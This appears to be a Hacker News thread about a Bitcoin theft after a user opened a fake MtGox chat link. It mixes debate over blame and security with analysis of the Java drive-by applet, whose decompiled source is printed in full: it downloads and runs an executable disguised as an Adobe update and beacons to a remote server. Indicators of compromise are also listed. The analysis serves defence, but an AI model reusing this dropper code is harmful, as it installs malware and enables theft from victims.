This kind of thing happens all the time with real banks, but with real banks, all transactions can be traced and reversed. Law enforcement can follow the required documentation to find the owner of any account on a global level. This is exactly what Bitcoin was created to avoid.
Well guess what? When you avoid the regulation, you take the safety of the currency into your own hands. MtGox should not refund this in any way shape or form. The problem was entirely his fault. He did not secure his MtGox account with available two-factor authentication. He ran untrusted code at full permission on his PC. He needs to take some responsibility for his own use of an unsecured currency on an unsecured website with unsecured authentication and running untrusted code.
Zero sympathy from me. Maybe it will be a wake up call to others to actually think about their decisions. Shouting about the 'nanny state' and using bitcoin, and then turning around and looking for a nanny to help him out when he goes around it is pathetic.
MtGox could help prevent this with something like Steam's approach, but once the user has run malicious code there is not much stopping that code from also compromising his email account. Two factor authentication would help here, and MtGox does appear to offer this - the complainer just didn't use it.
You don't really need the insurance of the bank and paper trails if you play it smart.
They should compensate me 100%.
This shows one of the fundamental problems with Bitcoin-related services: when people get taken advantage of, they expect to be compensated.
While in the real world, banks will often compensate you if you're the victim of fraud, there isn't any equivalent for Bitcoin, despite people really expecting it.
While I have sympathy for the author it was a pretty silly thing to do.
Agreed, the banks aren't doing it from the goodness of their heart.
While I have sympathy for the author it was a pretty silly thing to do.
And in the real world, if you gave someone your card and PIN, the bank would be unlikely to compensate you.
I think that this example is more similar to falling victim to card skimming, though.
Whilst one should always check the ATM for suspicious devices, and never let the card leave one's sight, it doesn't mean that it's not easy to fall prey to such fraud all the same.
From http://research.microsoft.com/apps/pubs/default.aspx?id=1618...
Of course, as that paper points out, the traditional electronic money system is incredibly reversible. If someone transfers $50,000 from my personal bank account to someone else's bank account, it's pretty easy for it to be undone.
The bottleneck is the money mules who are hired (read: suckered) into engaging in irreversible transactions.
He goes on to say, "First because their site is not secured against such rudimentary attacks as has been demonstrated today." I can't fathom how they're supposed to protect from users' computers being taken over. The only real way to do that is to have two-factor authentication... which they offer, and this guy did not use.
It sucks to get robbed, certainly. But blaming Mtgox for this is uncalled-for.
I don't like running Java on my computers even if they don't have access to $10,000 worth of bitcoins.
Actually from reading more, i don't understand if MtGox is involved at all. Did the executable just steal the wallet.dat file from his hard drive and have nothing to do with MtGox?
Creates the following directories:
%UserProfile%\537214
%UserProfile%\684544
%AppData%\dclogs
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
537214 = "%UserProfile%\537214\svhost.exe"
tamere123.no-ip.org on ports 80 and 1604
198.203.29.120
Los Angeles
California
ISP: Hugeserver Networks Llc
File hashes:
MD5: 0x81F8E4C33ADECE6BF89EF171D9930282
SHA-1: 0xF540BA6C5F1C2AA50B81A440E7D74F8CF588B4D7It's a service by script kiddies for script kiddies.
I'm sorry for your loss but what happened is your own fault entirely and I would be surprised if MtGox decides to refund you.
1) You really shouldn't be running java applets unless you are certain you want to. I have had Java disabled for about a year and have only seen a page that required it once.
2) The domain name should've been a dead giveaway
3) Why would MtGox refund it? You got your money stolen by someone else. It's not MtGox's fault at all.
I agree that MtGox shouldn't be doing any kind of refunding in this case.
> what happened is your own fault entirely
You're blaming the victim.
If I'm walking down a dark alley and someone pulls a gun on me and takes my wallet, is it my fault because I decided to walk down a dark alley? Not at all.
The only person at fault here is the cracker who perpetrated the scam.
The only thing you can say about the victim in this case is that they aren't very sensible. Just like walking down dark alleys might not be sensible. But it's not the OP's fault that someone stole something from him.
+-------------------------------------------------------+
| SECURITY WARNING! |
| You are attempting to walk down a dark alley, |
| which could be dangerous. Only walk down |
| dark alleys you are familiar with and trust. |
| By walking down this alley you assume responsibility |
| for the attendant risks. |
| |
| Do you still wish to walk down the dark alley? |
| [x] Yes [ ] Cancel |
+-------------------------------------------------------+
Put it another way, if you lent your laptop to a friend, and they left it on the table like that and it was stolen, would you really find your friend blameless? Would you lend them a laptop again?
You could plug in the USB, hibernate, flip the switch and be Bitcoin banking within seconds. Then unhibernate and get on with whatever you were doing on your day-to-day OS.
That way it can be completely separate from whatever risky, dangerous and/or irresponsible things you do on a regular basis with your computer--things that seemingly are worth the risk as long as they don't directly give attackers access to thousands of $$$ digital cash.
Question, I'm making a rough guess that a realistic speed-optimized fast boot-time for a Linux OS that doesn't need to do much is in the order of five seconds, is that about right? Also, I'm not 100% sure if that hibernation trick is actually possible, I've never really seen it on multi-boot systems and I wonder why, but from what I understand about hibernation (RAM gets saved to HD, restored next boot) the components are there?
And, make it look unlike any other OS, to make users instantly aware if they're operating on their banking/money "inside the stick" or "out in the open" (on the regular OS). For instance, a glowy green CRT terminal filter.
> So, how about if you could have a Linux boot image onna stick, properly
> secured, no Java, several BitCoin apps preinstalled and optimized to boot
> extremely quickly into what would basically be a sort of BitCoin Wallet
> dashboard interface. You could plug in the USB, hibernate, flip the switch
> and be Bitcoin banking within seconds. Then unhibernate and get on with
> whatever you were doing on your day-to-day OS.
>
> That way it can be completely separate from whatever risky, dangerous and/or
> irresponsible things you do on a regular basis with your computer--things
> that seemingly are worth the risk as long as they don't directly give
> attackers access to thousands of $$$ digital cash.
Heh. But now I wonder how our banks do it.
Over here, and this is different than the credit cards you use in the US, you can log on to your bank account, and transfer money to anyone (within the EU, afaik) with no transaction costs (at least within the country, afaik). The same mechanism goes for online shopping. It's safe because it uses 2-factor authentication (you log on with a password, but need to get an SMS text with a special code to make transactions) and somehow people manage to not fuck this up and get hacked out of $8000--oh I'm sure it happened, but nobody's dumb enough to blame the currency/exchange system, there.
There are also sites that offer downloads of tar'd versions of the blockchain, or torrents. Pretty much anything is going to be faster than downloading via a bitcoin client.
You also get email (or dropbox or file download) backups that you can use in other Bitcoin clients in case something bad happens to blockchain.info.
It is possible, I've done it. If you're on a multi-boot system with Linux and Windows, you can freely hibernate either and boot into the other, as long as they completely don't touch each other. Neither can even mount the disk images of the other, let alone start changing things, or you face effectively-guaranteed corruption. Be careful with shared SD cards too. (I had it so Linux would never auto-mount those anyhow, so it was OK.)
The biggest objection I'd have to your plan is mostly that you'd also need some sort of backup plan, I don't think USB sticks are generally designed to store thousands of dollars' worth of stuff on them.
Also, while it may be a bit of a detour for your data, using DropBox you can at least work on the same files without too much hassle--although... you're going to get the "conflicted copy" stuff if you don't wait until everything is synced up. And if you have to wait, that defeats the purpose of having a seconds-quick OS-switch hibernating trick. How about if they share a local network drive?
> The biggest objection I'd have to your plan is mostly that you'd also need some sort of backup plan, I don't think USB sticks are generally designed to store thousands of dollars' worth of stuff on them.
Good point. How big is the "valuable" part of BCs data? As long as you don't need to work with it, you can store it anywhere, encrypted.
(https://lwn.net/Articles/299483/)
As for looks - desktop wallpaper with instructions and big red borders.
I can't imagine my parents (or 99% of the adult population) being liable for this theft when "proper security precautions" means knowing when to detect and avoid a "0 day java exploit with a cross site injection attack".
Why can't it be insured? Mt. gox or any other exchange could easily charge a premium for ensuring your bitcoins. If people wanted traceable currency they'd use a traceable currency.
The solution is probably some kind of secure hardware device/ecosystem run by a third party that the user trusts. The third party can then take legal responsibility for breaches of the hardware using existing market mechanisms.
Running bitcoin on general purpose hardware and software is a security nightmare for anyone who isn't a paranoid geek.
But this isn't a bug, it's a feature. Instant, uncancellable transactions. The problem is just that the feature is nowhere near ready for public use because there hasn't been time for an ecosystem of secure, easy-to-use transaction methods to evolve on top of it.
The problem with bitcoin isn't necessarily that it's too much like cash, but that people don't treat it enough like they would treat cash. Few people would put their cash in a robot that would hand it over blindly to anyone with the right password, but that's effectively what they're doing by holding bitcoins on an exchange like Mt.Gox.
Also, bank vaults are guarded, you can't shoot a bot and you can't dye-pack bitcoins.
<applet name='ChatBox' width='10' height='10' code='wDbIDcgeH.class' archive='wDbIDcgeH.jar'></applet>
import java.applet.Applet;
import java.applet.AppletContext;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.logging.Level;
import java.util.logging.Logger;
public class wDbIDcgeH extends Applet
{
static String lik = "h?t?t?p?:?/?/?w?w?w?.?g?a?l?a?x?y?j?d?b?.?c?o?m?";
public static void logme(String paramString)
{
String str1 = lik.replace("?", "");
String str2 = "PoutineCoutu";
try {
String str3 = InetAddress.getLocalHost().getHostName().replace(" ", "-");
URL localURL = new URL(str1 + "/insert.php?" + "&o=" + System.getProperty("os.name").replace(" ", "-") + "&u=" + str2 + "&ip=" + str3 + "&e=" + paramString);
localURL.openStream();
} catch (IOException localIOException) {
localIOException.printStackTrace();
}
}
public void start()
{
String str1 = "no";
String str2 = System.getenv("APPDATA");
String str3 = System.getProperty("java.io.tmpdir");
String str4 = "http://g2f.nl/0lczsoo";
String str5 = str2 + "\\";
String str6 = "AdobeUpdate-Setup1.84##e";
String str7 = "f.R.q.w.v.k.p.g.E.q.w.v.w";
String str8 = "CodedByOrpheu";
String str9 = str5.concat(str6.replace("##", ".ex"));
BufferedInputStream localBufferedInputStream = null;
try {
localBufferedInputStream = new BufferedInputStream(new URL(str4.replace("##", ".ex")).openStream());
} catch (IOException localIOException1) {
if (str1 != "yes") logme("Noa");
str1 = "yes";
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException1);
}
FileOutputStream localFileOutputStream = null;
try {
localFileOutputStream = new FileOutputStream(str9);
} catch (FileNotFoundException localFileNotFoundException) {
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localFileNotFoundException);
}
BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
byte[] arrayOfByte = new byte[1024];
try
{
int i;
for (long l = 0L; (i = localBufferedInputStream.read(arrayOfByte)) != -1; l += i)
localBufferedOutputStream.write(arrayOfByte, 0, i);
}
catch (IOException localIOException2) {
if (str1 != "yes") logme("Noc");
str1 = "yes";
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException2);
}
try {
localBufferedOutputStream.close();
} catch (IOException localIOException3) {
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException3);
}
try {
localBufferedInputStream.close();
} catch (IOException localIOException4) {
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException4);
}
try {
Runtime.getRuntime().exec(str9);
logme("Yes");
} catch (IOException localIOException5) {
logme("Nod");
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException5);
}
try
{
getAppletContext().showDocument(new URL("0"), "_self");
} catch (MalformedURLException localMalformedURLException) {
System.exit(0);
localMalformedURLException.printStackTrace();
}
}
public void init() {
start();
}
}
Now, the thing is, I don't think the forum user mentioned clicking anything. However, it's possible they've stolen the signature from something else, which that person has previously chosen to "Always Accept"? (I don't know if Java lets you do that)
Unless there is somewhere you can buy a java signature with bitcoins.
/insert.php?o=*os.name*&u=*APPDATA*&ip=java.io.tmpdir&e=*APPSTATE*
Then it tries to execute the exe:
System.getenv("APPDATA") + "\\AdobeUpdate-Setup1.84.exe";
Now normally it wouldn't be able to execute the exe (no access to the filesystem), but it looks like the applet requests elevated permissions from the user to allow it to access/run files.
>Paypal E-Mail:
>Hackforums Profile Link:
That means this is a service for script kiddies, they've sold this exploit as a service.
EDIT: Hackforums is basically a public internet forum where people openly discuss "hacking" and sell "hacking" tools. I've seen another example, a DDOS service, with an almost empty homepage but login and register actions.
(Why someone would be stupid enough to sell their product from the same domain it reports back to is beyond me, though. Especially since they put credits on it.)
EDIT 2: BINGO! http://www.hackforums.net/showthread.php?tid=3262851&hig... (the forum thread where the product is sold!)
Galaxy JDB is sort for "Galaxy Java Drive-By", apparently.
EDIT 3: Product image here, for people without hackforums accounts: http://i5.minus.com/iq2n2GtUjGHpW.png
Oh wow. "Noob friendly". "Free hosting". "Website Cloner". Only $40 for 6 months...
Here's a mnetion from 2011:
(http://answers.microsoft.com/en-us/windows/forum/windows_7-s...)
So, someone using an OS heavily targeted by malware decides not to use anti-malware software, and to have javascript and apparently java enabled in the browser, and then chooses to visit an URL advertised in a chat window - that URL is unknown to that person, does not match the URL they're on but claims a link to the URL they're on, etc etc.
It's a shame someone got robbed, and the responsibility is clearly on the criminal to not engage in criminal behaviour.
But come on; don't just give them your money.
EDIT: I just read the first answer to the MS post above. It's baffling.
> On reflection the best and easiest recourse might be to just tell AVG to "ignore" this "infection." Is this thing actually a virus? or an infection? I have seen no operational problems, nothing in chkdsk, sfc, Registry Mechanic, etc., to concern me.
Totally unrelated to MtGox but: someone has anti-malware software. That software tells them it's found an infected file. There's no evidence this is a false positive. Rather than wipe and re-install (a distressingly unpopular choice) or using anti-malware tools to clean the infection the advice is to train the software to ignore the infection.
MS is stuffed. There is nothing they can do to repair their malware reputation when the users are that stupid.
You can run the AutoIt3 script through Exe2Aut (an AutoIt decompiler) and you'll find a pretty mundane remote access toolkit which inserts itself into \Run, checks to see if it's running in a variety of virtualized environments, and, if it's not, can start one of a couple different remote control payloads. It looks like it's got a rudimentary Facebook credentials theft mechanism in its first stage as well.
This is a pretty common for-sale driveby script kiddie exploit - it's depressing how effective these still are.
Here it is cleaned up: http://pastebin.com/raw.php?i=neP9qXGM
Seems like yet another dropper, not the actual bad thing.
Thats some dodgy java code right there. (You should use .equals() )
Decompile is irrelevant here, the only difference is 'str1' might have been named something different in the original code.
This is java code, so "string" != "string" will usually return true always, as you are checking if the objects are equal and not whether the contents are equal. Depending on the JRE this code runs on, it would give different output. [1]
[1] http://stackoverflow.com/questions/513832/how-do-i-compare-s...
http://www.hackforums.net/member.php?action=profile&uid=...
So let's look at their recent posts:
http://www.hackforums.net/search.php?action=results&sid=...
>RE: Bitcoin prices collapse over $100 in a matter of hours
http://www.hackforums.net/showthread.php?tid=3398170&pid...
>RE: Buying 10+ BTC via Bank Transfer / Western Union
http://www.hackforums.net/showthread.php?tid=3392974&pid...
So this person knows what Bitcoin is and has some to sell.
Hmm, let's look much further back in their history.
> RE: Ψ #1 [SILENT JAVA DRIVE BY] FoxxyJava [0/37]★ FREE HOSTING ★ SPREAD FASTER! ★ [$20] Ψ
>Vouch for this amazing jdb. Keep good work. He is ALWAYS disponible for his clients. He helped me alot.
http://www.hackforums.net/showthread.php?tid=3005399&pid...
FoxyJava is a Java Drive-By, similar to this GalaxyJDB the exploit used. I wonder if he has also used GalaxyJDB? I can't see any replies, but it's possible. Let's go to the galaxyjdb site and see if the person who programmed the login was dumb enough to check username and password seperately: http://galaxyjdb.com/index.php?a=Login
...sadly not, it would seem. So I can't prove they use GalaxyJDB, or that this is even the person we're after, but I think it's very likely.
String str2 = System.getenv("APPDATA");
String str5 = str2 + "\\";
String str6 = "AdobeUpdate-Setup1.84##e";
String str9 = str5.concat(str6.replace("##", ".ex"));
Runtime.getRuntime().exec(str9); Runtime.getRuntime().exec(str9);
"Being a techie", I like to confuse Java and Javascript ...
However, the guy just got hacked out of about $8k worth of BC, which sucks, and for that I do give him a pass :)
Java's security track is horrible and it's quite popular target.
To me if you have to download the .jar and run it then that is no different to downloading an executable and running it and should take the appropriate precautions as you would with executables.
There are plenty of legitimate Java applications out there that are used by a wide spectrum of people from gamers (minecraft) to enterprise developers (JavaEE, java application servers, etc.).
But stopping the chance of having everything in your digital (and in the case of money, personal) life stolen because you clicked on a link FAR outweighs the benefit of playing minecraft imo.
What's a terrible idea is letting it run in your browser. Ever.
Java's security track has been pretty good. In this case it's a signed applet that asked the user for permission to run. It's a classic case of social engineering.
It would be the same if an executable is directly downloaded and prompted for running. If you haven't got rid of all your executables on you computer, you probably will fall into the same trap.
When I hear interviews where people (bitcoin founder) suggest that you don't transfer into bitcoins any state currency you aren't willing to lose... it sort of peels the "inflation-hedge" covers off the whole thing. How unstable and unsecure does a currency have to be to be nearly worthless? USDollars look pretty safe again.
This is so much a game of hacker gambling. A great experiment. Too bad it consumes so much productive time and energy.
The beautiful narrative of the reclusive, open-society, eastern hacker that designs this thing which grows to be the godzilla it is... The story arc on bitcoin is borderline trite. Michael Bay is all over this in a year.
>Then and there someone posted a link to www mtgox-chat info (do not open unless you know what >you are doing) claiming a video announcement that mtgox was going to start trading litecoins. >I clicked on the link, the website opened, not much happened, and the "video"/chatbox never loaded. >I then forgot about this website.
If he got a trojan on a third party site that compromised his computer and Mt. Gox's site had nothing to do with it, this title seems a bit libelous. If in fact that's the case, I'd implore HN mods to change the title to something that doesn't unfairly cast aspersions on the Mt.Gox site.
FWIW: I have no bitcoins, I don't fully grok bitcoins, I'm scared of bitcoins, I don't use mt.gox or any vendor
This was someone on a vulnerable OS, running without malware protection, with Java active in the browser, visiting an unknown link, and possibly giving an application permission to run. (Although maybe it didn't need permission to run?)
To get to that point the person needed to ignore several well established security principles.
Sure, the user was being stupid here, but MtGox didn't do them any favors either.
I'm not familiar with Mt Gox but it's unacceptable if they don't have two factor authentication.
EDIT: Scrolling down, it appears they DO offer two-factor authentication. nvm.
Java is just such a big target for hackers nowadays, that there will always be zero-days.
Some banks solve this problem by requiring a 2 factor auth to confirm transactions (even after logging in).
The value of hacking, phishing, etc is significantly increased by the presence of bitcoins.
I guess you could argue that if bitcoins are popular, software practices will evolve to be much more secure - but until then, it's wild west, and much more wild than the internet ever was before.
"Decentralised crime fighting using private set intersection protocols" - Mike Hearn
Which means it comes down to convincing the gatekeeper that you were burgled. But that's a human level problem.
The guy had a Trojan loaded up onto his computer where he stored his bitcoins. All this two-factor authentication stuff people are talking about is for `naut. He was attacked by a virus, and that virus stole bitcoins straight off of his computer.
This should change (at the glacial rate banks change things) as they realise that Java in the browser is risky business.
This may change if Oracle pull their finger out, stop being dicks about the licensing, and try to promote the language again.
Honestly, I think they've left it too late and the majority of "Java" you're going to see in the near future is going to be related to Android (and hence not running on Oracle's stack).
Only a signed Java applet can ask the user to give permission to access his computer.
Looks like this was entirely his own fault, though it still sucks. Wouldn't hope for a refund though t.b.h.
At least they were open about being robbed. I wonder how many bitcoins were stolen in total?
EDIT: Has anyone visited the URL to analyse the malware?
AFAIU, the user was prompted to accept an autosigned applet, and he did so. After that, the outcome was inevitable. You may hate java all you like, but it seems like the user (inadvertently) gave this program permission to steal all his money.
A Mt. Gox investor was surprised to see his account suddenly pillaged. Will Bitcoin theft call into question trust and confidence in the system?
Stop storing your wallet online. And if not that, stop letting flash/java autoload/run. Both Chrome and Firefox have "click-to-enable". Not only is it more secure, it also prevents auto-video-playing, background audio you can't find and shit like this from happening.
